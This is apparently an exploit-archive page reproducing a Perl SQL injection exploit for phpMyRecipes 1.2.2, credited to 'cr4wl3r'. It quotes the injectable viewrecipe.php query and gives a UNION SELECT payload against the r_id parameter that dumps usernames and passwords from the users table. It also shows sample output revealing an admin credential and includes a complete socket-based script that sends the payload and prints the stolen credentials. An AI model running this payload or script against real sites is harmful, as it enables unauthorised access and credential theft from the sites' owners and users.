扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
#phpMyRecipes 1.2.2 SQL Injection Exploit #By cr4wl3r http://bastardlabs.info #Script: http://sourceforge.net/projects/php-myrecipes/files/ #Demo: http://bastardlabs.info/demo/phpMyRecipes.png #Tested: Ubuntu Linux # # Bugs found in viewrecipe.php # #$r_id = $_GET['r_id']; # #if (! ($result = mysql_query("SELECT # name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) { #dberror("viewrecipe.php", "Cannot select recipe"); #} # # http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=[SQLi] # Example: http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users # # # $ perl recipes.pl localhost /demo/ # [+] Please Wait ... # # [+] Getting Username and Password[ ok ] # [+] w00tw00t # [+] Username | Password --> admin:mps4BNRRjh3po #!/usr/bin/perl use IO::Socket; $host = $ARGV[0]; $path = $ARGV[1]; if (@ARGV < 2) { print qq( +---------------------------------------------+ | phpMyRecipes 1.2.2 SQL Injection Exploit| | | |coded & exploited by cr4wl3r | | http://bastardlabs.info/| +---------------------------------------------+ -=[X]=- +--------------------------------------- Usage : perl $0 <host> <path> ex : perl $0 127.0.0.1 /phpMyRecipes/ +--------------------------------------- ); } $target = "http://".$host.$path."/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") || die "[-] Can't connect to Server [ failed ]\n"; print "[+] Please Wait ...\n"; print $sock "GET $target HTTP/1.1\n"; print $sock "Accept: */*\n"; print $sock "User-Agent: BastardLabs\n"; print $sock "Host: $host\n"; print $sock "Connection: close\n\n"; sleep 2; while ($answer = <$sock>) { if ($answer =~ /<B>(.*?)<\/B>/) { print "\n[+] Getting Username and Password[ ok ]\n"; sleep 1; print "[+] w00tw00t\n"; print "[+] Username | Password --> $1\n"; exit(); } } print "[-] Exploit Failed !\n"; |
体验盒子
